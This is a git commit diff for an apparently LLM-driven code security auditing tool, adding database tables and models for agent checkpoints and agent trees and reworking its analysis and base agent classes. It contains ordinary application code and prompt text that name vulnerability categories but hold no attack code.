feat(agent): implement comprehensive agent architecture with knowledge base and persistence layer
- Add database migrations for agent checkpoints and tree node tracking - Implement core agent execution framework with executor, state management, and message handling - Create knowledge base system with framework-specific modules (Django, FastAPI, Flask, Express, React, Supabase) - Add vulnerability knowledge modules covering authentication, cryptography, injection, XSS, XXE, SSRF, path traversal, deserialization, and race conditions - Introduce new agent tools: thinking tool, reporting tool, and agent-specific utilities - Implement LLM memory compression and prompt caching for improved performance - Add agent registry and persistence layer for checkpoint management - Refactor agent implementations (analysis, recon, verification, orchestrator) with enhanced capabilities - Remove legacy agent implementations (analysis_v2, react_agent) - Update API endpoints for agent task creation and project management - Add frontend components for agent task creation and enhanced audit UI - Consolidate agent service architecture with improved separation of concerns - This refactoring provides a scalable foundation for multi-agent collaboration with knowledge-driven decision making and state persistence
This commit is contained in:
parent
147dfbaf5e
commit
f05c0073e1
|
|
@ -0,0 +1,68 @@
|
|||
"""Add agent checkpoint and tree node tables
|
||||
|
||||
Revision ID: 007_add_agent_checkpoint_tables
|
||||
Revises: 006_add_agent_tables
|
||||
Create Date: 2024-12-12
|
||||
|
||||
"""
|
||||
from alembic import op
|
||||
import sqlalchemy as sa
|
||||
|
||||
|
||||
# revision identifiers, used by Alembic.
|
||||
revision = '007_add_agent_checkpoint_tables'
|
||||
down_revision = '006_add_agent_tables'
|
||||
branch_labels = None
|
||||
depends_on = None
|
||||
|
||||
|
||||
def upgrade() -> None:
|
||||
# Create agent_checkpoints table
|
||||
op.create_table(
|
||||
'agent_checkpoints',
|
||||
sa.Column('id', sa.String(36), primary_key=True),
|
||||
sa.Column('task_id', sa.String(36), sa.ForeignKey('agent_tasks.id', ondelete='CASCADE'), nullable=False, index=True),
|
||||
sa.Column('agent_id', sa.String(50), nullable=False, index=True),
|
||||
sa.Column('agent_name', sa.String(255), nullable=False),
|
||||
sa.Column('agent_type', sa.String(50), nullable=False),
|
||||
sa.Column('parent_agent_id', sa.String(50), nullable=True),
|
||||
sa.Column('state_data', sa.Text, nullable=False),
|
||||
sa.Column('iteration', sa.Integer, default=0),
|
||||
sa.Column('status', sa.String(30), nullable=False),
|
||||
sa.Column('total_tokens', sa.Integer, default=0),
|
||||
sa.Column('tool_calls', sa.Integer, default=0),
|
||||
sa.Column('findings_count', sa.Integer, default=0),
|
||||
sa.Column('checkpoint_type', sa.String(30), default='auto'),
|
||||
sa.Column('checkpoint_name', sa.String(255), nullable=True),
|
||||
sa.Column('checkpoint_metadata', sa.JSON, nullable=True),
|
||||
sa.Column('created_at', sa.DateTime(timezone=True), server_default=sa.func.now(), index=True),
|
||||
)
|
||||
|
||||
# Create agent_tree_nodes table
|
||||
op.create_table(
|
||||
'agent_tree_nodes',
|
||||
sa.Column('id', sa.String(36), primary_key=True),
|
||||
sa.Column('task_id', sa.String(36), sa.ForeignKey('agent_tasks.id', ondelete='CASCADE'), nullable=False, index=True),
|
||||
sa.Column('agent_id', sa.String(50), nullable=False, unique=True, index=True),
|
||||
sa.Column('agent_name', sa.String(255), nullable=False),
|
||||
sa.Column('agent_type', sa.String(50), nullable=False),
|
||||
sa.Column('parent_agent_id', sa.String(50), nullable=True, index=True),
|
||||
sa.Column('depth', sa.Integer, default=0),
|
||||
sa.Column('task_description', sa.Text, nullable=True),
|
||||
sa.Column('knowledge_modules', sa.JSON, nullable=True),
|
||||
sa.Column('status', sa.String(30), default='created'),
|
||||
sa.Column('result_summary', sa.Text, nullable=True),
|
||||
sa.Column('findings_count', sa.Integer, default=0),
|
||||
sa.Column('iterations', sa.Integer, default=0),
|
||||
sa.Column('tokens_used', sa.Integer, default=0),
|
||||
sa.Column('tool_calls', sa.Integer, default=0),
|
||||
sa.Column('duration_ms', sa.Integer, nullable=True),
|
||||
sa.Column('created_at', sa.DateTime(timezone=True), server_default=sa.func.now()),
|
||||
sa.Column('started_at', sa.DateTime(timezone=True), nullable=True),
|
||||
sa.Column('finished_at', sa.DateTime(timezone=True), nullable=True),
|
||||
)
|
||||
|
||||
|
||||
def downgrade() -> None:
|
||||
op.drop_table('agent_tree_nodes')
|
||||
op.drop_table('agent_checkpoints')
|
||||
|
|
@ -0,0 +1,29 @@
|
|||
"""merge_heads
|
||||
|
||||
Revision ID: 4c280754c680
|
||||
Revises: 004_add_prompts_and_rules, 007_add_agent_checkpoint_tables
|
||||
Create Date: 2025-12-12 12:07:42.238185
|
||||
|
||||
"""
|
||||
from alembic import op
|
||||
import sqlalchemy as sa
|
||||
|
||||
|
||||
# revision identifiers, used by Alembic.
|
||||
revision = '4c280754c680'
|
||||
down_revision = ('004_add_prompts_and_rules', '007_add_agent_checkpoint_tables')
|
||||
branch_labels = None
|
||||
depends_on = None
|
||||
|
||||
|
||||
def upgrade() -> None:
|
||||
pass
|
||||
|
||||
|
||||
def downgrade() -> None:
|
||||
pass
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
File diff suppressed because it is too large
Load Diff
|
|
@ -676,15 +676,26 @@ async def get_project_branches(
|
|||
|
||||
repo_type = project.repository_type or "other"
|
||||
|
||||
# 详细日志
|
||||
print(f"[Branch] 项目: {project.name}, 类型: {repo_type}, URL: {project.repository_url}")
|
||||
print(f"[Branch] GitHub Token: {'已配置' if github_token else '未配置'}, GitLab Token: {'已配置' if gitlab_token else '未配置'}")
|
||||
|
||||
try:
|
||||
if repo_type == "github":
|
||||
if not github_token:
|
||||
print("[Branch] 警告: GitHub Token 未配置,可能会遇到 API 限制")
|
||||
branches = await get_github_branches(project.repository_url, github_token)
|
||||
elif repo_type == "gitlab":
|
||||
if not gitlab_token:
|
||||
print("[Branch] 警告: GitLab Token 未配置,可能无法访问私有仓库")
|
||||
branches = await get_gitlab_branches(project.repository_url, gitlab_token)
|
||||
else:
|
||||
# 对于其他类型,返回默认分支
|
||||
print(f"[Branch] 仓库类型 '{repo_type}' 不支持获取分支,返回默认分支")
|
||||
branches = [project.default_branch or "main"]
|
||||
|
||||
print(f"[Branch] 成功获取 {len(branches)} 个分支")
|
||||
|
||||
# 将默认分支放在第一位
|
||||
default_branch = project.default_branch or "main"
|
||||
if default_branch in branches:
|
||||
|
|
@ -694,7 +705,8 @@ async def get_project_branches(
|
|||
return {"branches": branches, "default_branch": default_branch}
|
||||
|
||||
except Exception as e:
|
||||
print(f"获取分支列表失败: {e}")
|
||||
error_msg = str(e)
|
||||
print(f"[Branch] 获取分支列表失败: {error_msg}")
|
||||
# 返回默认分支作为后备
|
||||
return {
|
||||
"branches": [project.default_branch or "main"],
|
||||
|
|
|
|||
|
|
@ -442,3 +442,141 @@ class AgentFinding(Base):
|
|||
"ai_confidence": self.ai_confidence,
|
||||
"created_at": self.created_at.isoformat() if self.created_at else None,
|
||||
}
|
||||
|
||||
|
||||
class AgentCheckpoint(Base):
|
||||
"""
|
||||
Agent 检查点
|
||||
|
||||
用于持久化 Agent 状态,支持:
|
||||
- 任务恢复
|
||||
- 状态回滚
|
||||
- 执行历史追踪
|
||||
"""
|
||||
__tablename__ = "agent_checkpoints"
|
||||
|
||||
id = Column(String(36), primary_key=True, default=lambda: str(uuid.uuid4()))
|
||||
task_id = Column(String(36), ForeignKey("agent_tasks.id", ondelete="CASCADE"), nullable=False, index=True)
|
||||
|
||||
# Agent 信息
|
||||
agent_id = Column(String(50), nullable=False, index=True)
|
||||
agent_name = Column(String(255), nullable=False)
|
||||
agent_type = Column(String(50), nullable=False)
|
||||
parent_agent_id = Column(String(50), nullable=True)
|
||||
|
||||
# 状态数据(JSON 序列化的 AgentState)
|
||||
state_data = Column(Text, nullable=False)
|
||||
|
||||
# 执行状态
|
||||
iteration = Column(Integer, default=0)
|
||||
status = Column(String(30), nullable=False)
|
||||
|
||||
# 统计信息
|
||||
total_tokens = Column(Integer, default=0)
|
||||
tool_calls = Column(Integer, default=0)
|
||||
findings_count = Column(Integer, default=0)
|
||||
|
||||
# 检查点类型
|
||||
checkpoint_type = Column(String(30), default="auto") # auto, manual, error, final
|
||||
checkpoint_name = Column(String(255), nullable=True)
|
||||
|
||||
# 元数据
|
||||
checkpoint_metadata = Column(JSON, nullable=True)
|
||||
|
||||
# 时间戳
|
||||
created_at = Column(DateTime(timezone=True), server_default=func.now(), index=True)
|
||||
|
||||
def __repr__(self):
|
||||
return f"<AgentCheckpoint {self.agent_id} - iter {self.iteration}>"
|
||||
|
||||
def to_dict(self) -> dict:
|
||||
"""转换为字典"""
|
||||
return {
|
||||
"id": self.id,
|
||||
"task_id": self.task_id,
|
||||
"agent_id": self.agent_id,
|
||||
"agent_name": self.agent_name,
|
||||
"agent_type": self.agent_type,
|
||||
"parent_agent_id": self.parent_agent_id,
|
||||
"iteration": self.iteration,
|
||||
"status": self.status,
|
||||
"total_tokens": self.total_tokens,
|
||||
"tool_calls": self.tool_calls,
|
||||
"findings_count": self.findings_count,
|
||||
"checkpoint_type": self.checkpoint_type,
|
||||
"checkpoint_name": self.checkpoint_name,
|
||||
"created_at": self.created_at.isoformat() if self.created_at else None,
|
||||
}
|
||||
|
||||
|
||||
class AgentTreeNode(Base):
|
||||
"""
|
||||
Agent 树节点
|
||||
|
||||
记录动态 Agent 树的结构,用于:
|
||||
- 可视化 Agent 树
|
||||
- 追踪 Agent 间关系
|
||||
- 分析执行流程
|
||||
"""
|
||||
__tablename__ = "agent_tree_nodes"
|
||||
|
||||
id = Column(String(36), primary_key=True, default=lambda: str(uuid.uuid4()))
|
||||
task_id = Column(String(36), ForeignKey("agent_tasks.id", ondelete="CASCADE"), nullable=False, index=True)
|
||||
|
||||
# Agent 信息
|
||||
agent_id = Column(String(50), nullable=False, unique=True, index=True)
|
||||
agent_name = Column(String(255), nullable=False)
|
||||
agent_type = Column(String(50), nullable=False)
|
||||
|
||||
# 树结构
|
||||
parent_agent_id = Column(String(50), nullable=True, index=True)
|
||||
depth = Column(Integer, default=0) # 树深度
|
||||
|
||||
# 任务信息
|
||||
task_description = Column(Text, nullable=True)
|
||||
knowledge_modules = Column(JSON, nullable=True)
|
||||
|
||||
# 执行状态
|
||||
status = Column(String(30), default="created")
|
||||
|
||||
# 执行结果
|
||||
result_summary = Column(Text, nullable=True)
|
||||
findings_count = Column(Integer, default=0)
|
||||
|
||||
# 统计
|
||||
iterations = Column(Integer, default=0)
|
||||
tokens_used = Column(Integer, default=0)
|
||||
tool_calls = Column(Integer, default=0)
|
||||
duration_ms = Column(Integer, nullable=True)
|
||||
|
||||
# 时间戳
|
||||
created_at = Column(DateTime(timezone=True), server_default=func.now())
|
||||
started_at = Column(DateTime(timezone=True), nullable=True)
|
||||
finished_at = Column(DateTime(timezone=True), nullable=True)
|
||||
|
||||
def __repr__(self):
|
||||
return f"<AgentTreeNode {self.agent_name} ({self.agent_id})>"
|
||||
|
||||
def to_dict(self) -> dict:
|
||||
"""转换为字典"""
|
||||
return {
|
||||
"id": self.id,
|
||||
"task_id": self.task_id,
|
||||
"agent_id": self.agent_id,
|
||||
"agent_name": self.agent_name,
|
||||
"agent_type": self.agent_type,
|
||||
"parent_agent_id": self.parent_agent_id,
|
||||
"depth": self.depth,
|
||||
"task_description": self.task_description,
|
||||
"knowledge_modules": self.knowledge_modules,
|
||||
"status": self.status,
|
||||
"result_summary": self.result_summary,
|
||||
"findings_count": self.findings_count,
|
||||
"iterations": self.iterations,
|
||||
"tokens_used": self.tokens_used,
|
||||
"tool_calls": self.tool_calls,
|
||||
"duration_ms": self.duration_ms,
|
||||
"created_at": self.created_at.isoformat() if self.created_at else None,
|
||||
"started_at": self.started_at.isoformat() if self.started_at else None,
|
||||
"finished_at": self.finished_at.isoformat() if self.finished_at else None,
|
||||
}
|
||||
|
|
|
|||
|
|
@ -2,16 +2,17 @@
|
|||
DeepAudit Agent 服务模块
|
||||
基于 LangGraph 的 AI Agent 代码安全审计
|
||||
|
||||
架构:
|
||||
LangGraph 状态图工作流
|
||||
架构升级版本 - 支持:
|
||||
- 动态Agent树结构
|
||||
- 专业知识模块系统
|
||||
- Agent间通信机制
|
||||
- 完整状态管理
|
||||
- Think工具和漏洞报告工具
|
||||
|
||||
工作流:
|
||||
START → Recon → Analysis ⟲ → Verification → Report → END
|
||||
|
||||
节点:
|
||||
- Recon: 信息收集 (项目结构、技术栈、入口点)
|
||||
- Analysis: 漏洞分析 (静态分析、RAG、模式匹配)
|
||||
- Verification: 漏洞验证 (LLM 验证、沙箱测试)
|
||||
- Report: 报告生成
|
||||
支持动态创建子Agent进行专业化分析
|
||||
"""
|
||||
|
||||
# 从 graph 模块导入主要组件
|
||||
|
|
@ -32,6 +33,29 @@ from .agents import (
|
|||
OrchestratorAgent, ReconAgent, AnalysisAgent, VerificationAgent,
|
||||
)
|
||||
|
||||
# 🔥 新增:核心模块(状态管理、注册表、消息)
|
||||
from .core import (
|
||||
AgentState, AgentStatus,
|
||||
AgentRegistry, agent_registry,
|
||||
AgentMessage, MessageType, MessagePriority, MessageBus,
|
||||
)
|
||||
|
||||
# 🔥 新增:知识模块系统(基于RAG)
|
||||
from .knowledge import (
|
||||
KnowledgeLoader, knowledge_loader,
|
||||
get_available_modules, get_module_content,
|
||||
SecurityKnowledgeRAG, security_knowledge_rag,
|
||||
SecurityKnowledgeQueryTool, GetVulnerabilityKnowledgeTool,
|
||||
)
|
||||
|
||||
# 🔥 新增:协作工具
|
||||
from .tools import (
|
||||
ThinkTool, ReflectTool,
|
||||
CreateVulnerabilityReportTool,
|
||||
CreateSubAgentTool, SendMessageTool, ViewAgentGraphTool,
|
||||
WaitForMessageTool, AgentFinishTool,
|
||||
)
|
||||
|
||||
__all__ = [
|
||||
# 核心 Runner
|
||||
"AgentRunner",
|
||||
|
|
@ -54,5 +78,35 @@ __all__ = [
|
|||
"ReconAgent",
|
||||
"AnalysisAgent",
|
||||
"VerificationAgent",
|
||||
|
||||
# 🔥 核心模块
|
||||
"AgentState",
|
||||
"AgentStatus",
|
||||
"AgentRegistry",
|
||||
"agent_registry",
|
||||
"AgentMessage",
|
||||
"MessageType",
|
||||
"MessagePriority",
|
||||
"MessageBus",
|
||||
|
||||
# 🔥 知识模块(基于RAG)
|
||||
"KnowledgeLoader",
|
||||
"knowledge_loader",
|
||||
"get_available_modules",
|
||||
"get_module_content",
|
||||
"SecurityKnowledgeRAG",
|
||||
"security_knowledge_rag",
|
||||
"SecurityKnowledgeQueryTool",
|
||||
"GetVulnerabilityKnowledgeTool",
|
||||
|
||||
# 🔥 协作工具
|
||||
"ThinkTool",
|
||||
"ReflectTool",
|
||||
"CreateVulnerabilityReportTool",
|
||||
"CreateSubAgentTool",
|
||||
"SendMessageTool",
|
||||
"ViewAgentGraphTool",
|
||||
"WaitForMessageTool",
|
||||
"AgentFinishTool",
|
||||
]
|
||||
|
||||
|
|
|
|||
|
|
@ -46,8 +46,6 @@ ANALYSIS_SYSTEM_PROMPT = """你是 DeepAudit 的漏洞分析 Agent,一个**自
|
|||
### 深度分析
|
||||
- **pattern_match**: 危险模式匹配
|
||||
参数: pattern (str), file_types (list)
|
||||
- **code_analysis**: LLM 深度代码分析 ⭐
|
||||
参数: code (str), file_path (str), focus (str)
|
||||
- **dataflow_analysis**: 数据流追踪
|
||||
参数: source (str), sink (str)
|
||||
|
||||
|
|
@ -114,7 +112,7 @@ Final Answer: [JSON 格式的漏洞报告]
|
|||
|
||||
## 分析策略建议
|
||||
1. **快速扫描**: 先用 semgrep_scan 获得概览
|
||||
2. **重点深入**: 对可疑文件使用 read_file + code_analysis
|
||||
2. **重点深入**: 对可疑文件使用 read_file + pattern_match
|
||||
3. **模式搜索**: 用 search_code 找危险模式 (eval, exec, query 等)
|
||||
4. **语义搜索**: 用 RAG 找相似的漏洞模式
|
||||
5. **数据流**: 用 dataflow_analysis 追踪用户输入
|
||||
|
|
@ -268,6 +266,9 @@ class AnalysisAgent(BaseAgent):
|
|||
# 🔥 构建包含交接上下文的初始消息
|
||||
handoff_context = self.get_handoff_context()
|
||||
|
||||
# 🔥 获取目标文件列表
|
||||
target_files = config.get("target_files", [])
|
||||
|
||||
initial_message = f"""请开始对项目进行安全漏洞分析。
|
||||
|
||||
## 项目信息
|
||||
|
|
@ -275,7 +276,22 @@ class AnalysisAgent(BaseAgent):
|
|||
- 语言: {tech_stack.get('languages', [])}
|
||||
- 框架: {tech_stack.get('frameworks', [])}
|
||||
|
||||
{handoff_context if handoff_context else f'''## 上下文信息
|
||||
"""
|
||||
# 🔥 如果指定了目标文件,明确告知 Agent
|
||||
if target_files:
|
||||
initial_message += f"""## ⚠️ 审计范围
|
||||
用户指定了 {len(target_files)} 个目标文件进行审计:
|
||||
"""
|
||||
for tf in target_files[:10]:
|
||||
initial_message += f"- {tf}\n"
|
||||
if len(target_files) > 10:
|
||||
initial_message += f"- ... 还有 {len(target_files) - 10} 个文件\n"
|
||||
initial_message += """
|
||||
请直接分析这些指定的文件,不要分析其他文件。
|
||||
|
||||
"""
|
||||
|
||||
initial_message += f"""{handoff_context if handoff_context else f'''## 上下文信息
|
||||
### 高风险区域
|
||||
{json.dumps(high_risk_areas[:20], ensure_ascii=False)}
|
||||
|
||||
|
|
@ -307,6 +323,7 @@ class AnalysisAgent(BaseAgent):
|
|||
|
||||
self._steps = []
|
||||
all_findings = []
|
||||
error_message = None # 🔥 跟踪错误信息
|
||||
|
||||
await self.emit_thinking("🔬 Analysis Agent 启动,LLM 开始自主安全分析...")
|
||||
|
||||
|
|
@ -323,11 +340,12 @@ class AnalysisAgent(BaseAgent):
|
|||
break
|
||||
|
||||
# 调用 LLM 进行思考和决策(流式输出)
|
||||
# 🔥 增加 max_tokens 到 4096,避免长输出被截断
|
||||
try:
|
||||
llm_output, tokens_this_round = await self.stream_llm_call(
|
||||
self._conversation_history,
|
||||
temperature=0.1,
|
||||
max_tokens=2048,
|
||||
max_tokens=4096,
|
||||
)
|
||||
except asyncio.CancelledError:
|
||||
logger.info(f"[{self.name}] LLM call cancelled")
|
||||
|
|
@ -338,13 +356,22 @@ class AnalysisAgent(BaseAgent):
|
|||
# 🔥 Handle empty LLM response to prevent loops
|
||||
if not llm_output or not llm_output.strip():
|
||||
logger.warning(f"[{self.name}] Empty LLM response in iteration {self._iteration}")
|
||||
await self.emit_llm_decision("收到空响应", "LLM 返回内容为空,尝试重试通过提示")
|
||||
empty_retry_count = getattr(self, '_empty_retry_count', 0) + 1
|
||||
self._empty_retry_count = empty_retry_count
|
||||
if empty_retry_count >= 3:
|
||||
logger.error(f"[{self.name}] Too many empty responses, stopping")
|
||||
error_message = "连续收到空响应,停止分析"
|
||||
await self.emit_event("error", error_message)
|
||||
break
|
||||
self._conversation_history.append({
|
||||
"role": "user",
|
||||
"content": "Received empty response. Please output your Thought and Action.",
|
||||
})
|
||||
continue
|
||||
|
||||
# 重置空响应计数器
|
||||
self._empty_retry_count = 0
|
||||
|
||||
# 解析 LLM 响应
|
||||
step = self._parse_llm_response(llm_output)
|
||||
self._steps.append(step)
|
||||
|
|
@ -396,6 +423,11 @@ class AnalysisAgent(BaseAgent):
|
|||
step.action_input or {}
|
||||
)
|
||||
|
||||
# 🔥 工具执行后检查取消状态
|
||||
if self.is_cancelled:
|
||||
logger.info(f"[{self.name}] Cancelled after tool execution")
|
||||
break
|
||||
|
||||
step.observation = observation
|
||||
|
||||
# 🔥 发射 LLM 观察事件
|
||||
|
|
@ -414,9 +446,96 @@ class AnalysisAgent(BaseAgent):
|
|||
"content": "请继续分析。选择一个工具执行,或者如果分析完成,输出 Final Answer 汇总所有发现。",
|
||||
})
|
||||
|
||||
# 🔥 如果循环结束但没有发现,强制 LLM 总结
|
||||
if not all_findings and not self.is_cancelled and not error_message:
|
||||
await self.emit_thinking("📝 分析阶段结束,正在生成漏洞总结...")
|
||||
|
||||
# 添加强制总结的提示
|
||||
self._conversation_history.append({
|
||||
"role": "user",
|
||||
"content": """分析阶段已结束。请立即输出 Final Answer,总结你发现的所有安全问题。
|
||||
|
||||
即使没有发现严重漏洞,也请总结你的分析过程和观察到的潜在风险点。
|
||||
|
||||
请按以下 JSON 格式输出:
|
||||
```json
|
||||
{
|
||||
"findings": [
|
||||
{
|
||||
"vulnerability_type": "sql_injection|xss|command_injection|path_traversal|ssrf|hardcoded_secret|other",
|
||||
"severity": "critical|high|medium|low",
|
||||
"title": "漏洞标题",
|
||||
"description": "详细描述",
|
||||
"file_path": "文件路径",
|
||||
"line_start": 行号,
|
||||
"code_snippet": "相关代码片段",
|
||||
"suggestion": "修复建议"
|
||||
}
|
||||
],
|
||||
"summary": "分析总结"
|
||||
}
|
||||
```
|
||||
|
||||
Final Answer:""",
|
||||
})
|
||||
|
||||
try:
|
||||
summary_output, _ = await self.stream_llm_call(
|
||||
self._conversation_history,
|
||||
temperature=0.1,
|
||||
max_tokens=4096,
|
||||
)
|
||||
|
||||
if summary_output and summary_output.strip():
|
||||
# 解析总结输出
|
||||
import re
|
||||
summary_text = summary_output.strip()
|
||||
summary_text = re.sub(r'```json\s*', '', summary_text)
|
||||
summary_text = re.sub(r'```\s*', '', summary_text)
|
||||
parsed_result = AgentJsonParser.parse(
|
||||
summary_text,
|
||||
default={"findings": [], "summary": ""}
|
||||
)
|
||||
if "findings" in parsed_result:
|
||||
all_findings = parsed_result["findings"]
|
||||
except Exception as e:
|
||||
logger.warning(f"[{self.name}] Failed to generate summary: {e}")
|
||||
|
||||
# 处理结果
|
||||
duration_ms = int((time.time() - start_time) * 1000)
|
||||
|
||||
# 🔥 如果被取消,返回取消结果
|
||||
if self.is_cancelled:
|
||||
await self.emit_event(
|
||||
"info",
|
||||
f"🛑 Analysis Agent 已取消: {len(all_findings)} 个发现, {self._iteration} 轮迭代"
|
||||
)
|
||||
return AgentResult(
|
||||
success=False,
|
||||
error="任务已取消",
|
||||
data={"findings": all_findings},
|
||||
iterations=self._iteration,
|
||||
tool_calls=self._tool_calls,
|
||||
tokens_used=self._total_tokens,
|
||||
duration_ms=duration_ms,
|
||||
)
|
||||
|
||||
# 🔥 如果有错误,返回失败结果
|
||||
if error_message:
|
||||
await self.emit_event(
|
||||
"error",
|
||||
f"❌ Analysis Agent 失败: {error_message}"
|
||||
)
|
||||
return AgentResult(
|
||||
success=False,
|
||||
error=error_message,
|
||||
data={"findings": all_findings},
|
||||
iterations=self._iteration,
|
||||
tool_calls=self._tool_calls,
|
||||
tokens_used=self._total_tokens,
|
||||
duration_ms=duration_ms,
|
||||
)
|
||||
|
||||
# 标准化发现
|
||||
standardized_findings = []
|
||||
for finding in all_findings:
|
||||
|
|
|
|||
|
|
@ -6,6 +6,8 @@ Agent 基类
|
|||
1. LLM 是 Agent 的大脑,全程参与决策
|
||||
2. Agent 之间通过 TaskHandoff 传递结构化上下文
|
||||
3. 事件分为流式事件(前端展示)和持久化事件(数据库记录)
|
||||
4. 支持动态Agent树和专业知识模块
|
||||
5. 完整的状态管理和Agent间通信
|
||||
"""
|
||||
|
||||
from abc import ABC, abstractmethod
|
||||
|
|
@ -17,6 +19,10 @@ import asyncio
|
|||
import logging
|
||||
import uuid
|
||||
|
||||
from ..core.state import AgentState, AgentStatus
|
||||
from ..core.registry import agent_registry
|
||||
from ..core.message import message_bus, MessageType, AgentMessage
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
|
|
@ -238,6 +244,11 @@ class BaseAgent(ABC):
|
|||
1. 通过 TaskHandoff 接收前序 Agent 的上下文
|
||||
2. 执行完成后生成 TaskHandoff 传递给下一个 Agent
|
||||
3. 洞察和发现应该结构化记录
|
||||
|
||||
动态Agent树:
|
||||
1. 支持动态创建子Agent
|
||||
2. Agent间通过消息总线通信
|
||||
3. 完整的状态管理和生命周期
|
||||
"""
|
||||
|
||||
def __init__(
|
||||
|
|
@ -246,6 +257,8 @@ class BaseAgent(ABC):
|
|||
llm_service,
|
||||
tools: Dict[str, Any],
|
||||
event_emitter=None,
|
||||
parent_id: Optional[str] = None,
|
||||
knowledge_modules: Optional[List[str]] = None,
|
||||
):
|
||||
"""
|
||||
初始化 Agent
|
||||
|
|
@ -255,13 +268,30 @@ class BaseAgent(ABC):
|
|||
llm_service: LLM 服务
|
||||
tools: 可用工具字典
|
||||
event_emitter: 事件发射器
|
||||
parent_id: 父Agent ID(用于动态Agent树)
|
||||
knowledge_modules: 要加载的知识模块
|
||||
"""
|
||||
self.config = config
|
||||
self.llm_service = llm_service
|
||||
self.tools = tools
|
||||
self.event_emitter = event_emitter
|
||||
self.parent_id = parent_id
|
||||
self.knowledge_modules = knowledge_modules or []
|
||||
|
||||
# 运行状态
|
||||
# 🔥 生成唯一ID
|
||||
self._agent_id = f"agent_{uuid.uuid4().hex[:8]}"
|
||||
|
||||
# 🔥 增强的状态管理
|
||||
self._state = AgentState(
|
||||
agent_id=self._agent_id,
|
||||
agent_name=config.name,
|
||||
agent_type=config.agent_type.value,
|
||||
parent_id=parent_id,
|
||||
max_iterations=config.max_iterations,
|
||||
knowledge_modules=self.knowledge_modules,
|
||||
)
|
||||
|
||||
# 运行状态(保持向后兼容)
|
||||
self._iteration = 0
|
||||
self._total_tokens = 0
|
||||
self._tool_calls = 0
|
||||
|
|
@ -272,14 +302,170 @@ class BaseAgent(ABC):
|
|||
self._insights: List[str] = [] # 收集的洞察
|
||||
self._work_completed: List[str] = [] # 完成的工作记录
|
||||
|
||||
# 🔥 是否已注册到注册表
|
||||
self._registered = False
|
||||
|
||||
# 🔥 加载知识模块到系统提示词
|
||||
if self.knowledge_modules:
|
||||
self._load_knowledge_modules()
|
||||
|
||||
def _register_to_registry(self, task: Optional[str] = None) -> None:
|
||||
"""注册到Agent注册表(延迟注册,在run时调用)"""
|
||||
logger.info(f"[AgentTree] _register_to_registry 被调用: {self.config.name} (id={self._agent_id}, parent={self.parent_id}, _registered={self._registered})")
|
||||
|
||||
if self._registered:
|
||||
logger.warning(f"[AgentTree] {self.config.name} 已注册,跳过 (id={self._agent_id})")
|
||||
return
|
||||
|
||||
logger.info(f"[AgentTree] 正在注册 Agent: {self.config.name} (id={self._agent_id}, parent={self.parent_id})")
|
||||
|
||||
agent_registry.register_agent(
|
||||
agent_id=self._agent_id,
|
||||
agent_name=self.config.name,
|
||||
agent_type=self.config.agent_type.value,
|
||||
task=task or self._state.task or "Initializing",
|
||||
parent_id=self.parent_id,
|
||||
agent_instance=self,
|
||||
state=self._state,
|
||||
knowledge_modules=self.knowledge_modules,
|
||||
)
|
||||
|
||||
# 创建消息队列
|
||||
message_bus.create_queue(self._agent_id)
|
||||
self._registered = True
|
||||
|
||||
tree = agent_registry.get_agent_tree()
|
||||
logger.info(f"[AgentTree] Agent 注册完成: {self.config.name}, 当前树节点数: {len(tree['nodes'])}")
|
||||
|
||||
def set_parent_id(self, parent_id: str) -> None:
|
||||
"""设置父Agent ID(在调度时调用)"""
|
||||
self.parent_id = parent_id
|
||||
self._state.parent_id = parent_id
|
||||
|
||||
def _load_knowledge_modules(self) -> None:
|
||||
"""加载知识模块到系统提示词"""
|
||||
if not self.knowledge_modules:
|
||||
return
|
||||
|
||||
try:
|
||||
from ..knowledge import knowledge_loader
|
||||
|
||||
enhanced_prompt = knowledge_loader.build_system_prompt_with_modules(
|
||||
self.config.system_prompt or "",
|
||||
self.knowledge_modules,
|
||||
)
|
||||
self.config.system_prompt = enhanced_prompt
|
||||
|
||||
logger.info(f"[{self.name}] Loaded knowledge modules: {self.knowledge_modules}")
|
||||
except Exception as e:
|
||||
logger.warning(f"Failed to load knowledge modules: {e}")
|
||||
|
||||
@property
|
||||
def name(self) -> str:
|
||||
return self.config.name
|
||||
|
||||
@property
|
||||
def agent_id(self) -> str:
|
||||
return self._agent_id
|
||||
|
||||
@property
|
||||
def state(self) -> AgentState:
|
||||
return self._state
|
||||
|
||||
@property
|
||||
def agent_type(self) -> AgentType:
|
||||
return self.config.agent_type
|
||||
|
||||
# ============ Agent间消息处理 ============
|
||||
|
||||
def check_messages(self) -> List[AgentMessage]:
|
||||
"""
|
||||
检查并处理收到的消息
|
||||
|
||||
Returns:
|
||||
未读消息列表
|
||||
"""
|
||||
messages = message_bus.get_messages(
|
||||
self._agent_id,
|
||||
unread_only=True,
|
||||
mark_as_read=True,
|
||||
)
|
||||
|
||||
for msg in messages:
|
||||
# 处理消息
|
||||
if msg.from_agent == "user":
|
||||
# 用户消息直接添加到对话历史
|
||||
self._state.add_message("user", msg.content)
|
||||
else:
|
||||
# Agent间消息使用XML格式
|
||||
self._state.add_message("user", msg.to_xml())
|
||||
|
||||
# 如果在等待状态,恢复执行
|
||||
if self._state.is_waiting_for_input():
|
||||
self._state.resume_from_waiting()
|
||||
agent_registry.update_agent_status(self._agent_id, "running")
|
||||
|
||||
return messages
|
||||
|
||||
def has_pending_messages(self) -> bool:
|
||||
"""检查是否有待处理的消息"""
|
||||
return message_bus.has_unread_messages(self._agent_id)
|
||||
|
||||
def send_message_to_parent(
|
||||
self,
|
||||
content: str,
|
||||
message_type: MessageType = MessageType.INFORMATION,
|
||||
) -> None:
|
||||
"""向父Agent发送消息"""
|
||||
if self.parent_id:
|
||||
message_bus.send_message(
|
||||
from_agent=self._agent_id,
|
||||
to_agent=self.parent_id,
|
||||
content=content,
|
||||
message_type=message_type,
|
||||
)
|
||||
|
||||
def send_message_to_agent(
|
||||
self,
|
||||
target_id: str,
|
||||
content: str,
|
||||
message_type: MessageType = MessageType.INFORMATION,
|
||||
) -> None:
|
||||
"""向指定Agent发送消息"""
|
||||
message_bus.send_message(
|
||||
from_agent=self._agent_id,
|
||||
to_agent=target_id,
|
||||
content=content,
|
||||
message_type=message_type,
|
||||
)
|
||||
|
||||
# ============ 生命周期管理 ============
|
||||
|
||||
def on_start(self) -> None:
|
||||
"""Agent开始执行时调用"""
|
||||
self._state.start()
|
||||
agent_registry.update_agent_status(self._agent_id, "running")
|
||||
|
||||
def on_complete(self, result: Dict[str, Any]) -> None:
|
